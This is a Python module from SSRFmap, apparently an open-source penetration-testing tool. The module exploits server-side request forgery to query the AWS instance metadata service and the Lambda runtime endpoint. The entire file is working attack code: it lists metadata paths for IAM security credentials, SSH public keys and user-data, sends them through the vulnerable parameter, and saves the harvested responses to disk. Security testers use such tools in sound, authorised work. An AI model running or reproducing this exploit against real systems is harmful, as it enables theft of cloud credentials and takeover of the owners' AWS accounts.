SSRFmap/modules/aws.py

68 lines
3.1 KiB
Python

from core.utils import *
import logging
import os
name = "aws"
description = "Access sensitive data from AWS"
author = "Swissky"
documentation = [
"https://hackerone.com/reports/53088",
"https://hackerone.com/reports/285380",
"https://blog.christophetd.fr/abusing-aws-metadata-service-using-ssrf-vulnerabilities/",
"https://twitter.com/spengietz/status/1161317376060563456"
]
class exploit():
endpoints = set()
def __init__(self, requester, args):
logging.info(f"Module '{name}' launched !")
self.add_endpoints()
r = requester.do_request(args.param, "")
if r != None:
default = r.text
# Create directory to store files
directory = requester.host
# Replace : with _ for window folder name safe
# https://www.ibm.com/docs/en/spectrum-archive-sde/2.4.1.0?topic=tips-file-name-characters
directory = directory.replace(':','_')
if not os.path.exists(directory):
os.makedirs(directory)
for endpoint in self.endpoints:
payload = wrapper_http(endpoint[1], endpoint[0] , endpoint[2])
r = requester.do_request(args.param, payload)
diff = diff_text(r.text, default)
if diff != "":
# Display diff between default and ssrf request
logging.info(f"\033[32mReading file\033[0m : {payload}")
print(diff)
# Write diff to a file
filename = endpoint[1].split('/')[-1]
if filename == "":
filename = endpoint[1].split('/')[-2:-1][0]
logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}")
with open(directory + "/" + filename, 'w') as f:
f.write(diff)
def add_endpoints(self):
self.endpoints.add( ("169.254.169.254","latest/user-data", "80") )
self.endpoints.add( ("169.254.169.254","latest/meta-data/ami-id", "80") )
self.endpoints.add( ("169.254.169.254","latest/meta-data/reservation-id", "80") )
self.endpoints.add( ("169.254.169.254","latest/meta-data/hostname", "80") )
self.endpoints.add( ("169.254.169.254","latest/meta-data/public-keys/0/openssh-key", "80") )
self.endpoints.add( ("169.254.169.254","latest/meta-data/public-keys/1/openssh-key", "80") )
self.endpoints.add( ("169.254.169.254","latest/meta-data/public-keys/2/openssh-key", "80") )
self.endpoints.add( ("169.254.169.254","latest/meta-data/iam/security-credentials/dummy", "80") )
self.endpoints.add( ("169.254.169.254","latest/meta-data/iam/security-credentials/ecsInstanceRole", "80") )
self.endpoints.add( ("169.254.169.254","latest/meta-data/iam/security-credentials/", "80") )
self.endpoints.add( ("169.254.169.254","latest/meta-data/public-keys/", "80") )
self.endpoints.add( ("169.254.169.254","latest/user-data/", "80") )
self.endpoints.add( ("localhost","2018-06-01/runtime/invocation/next", "9001") )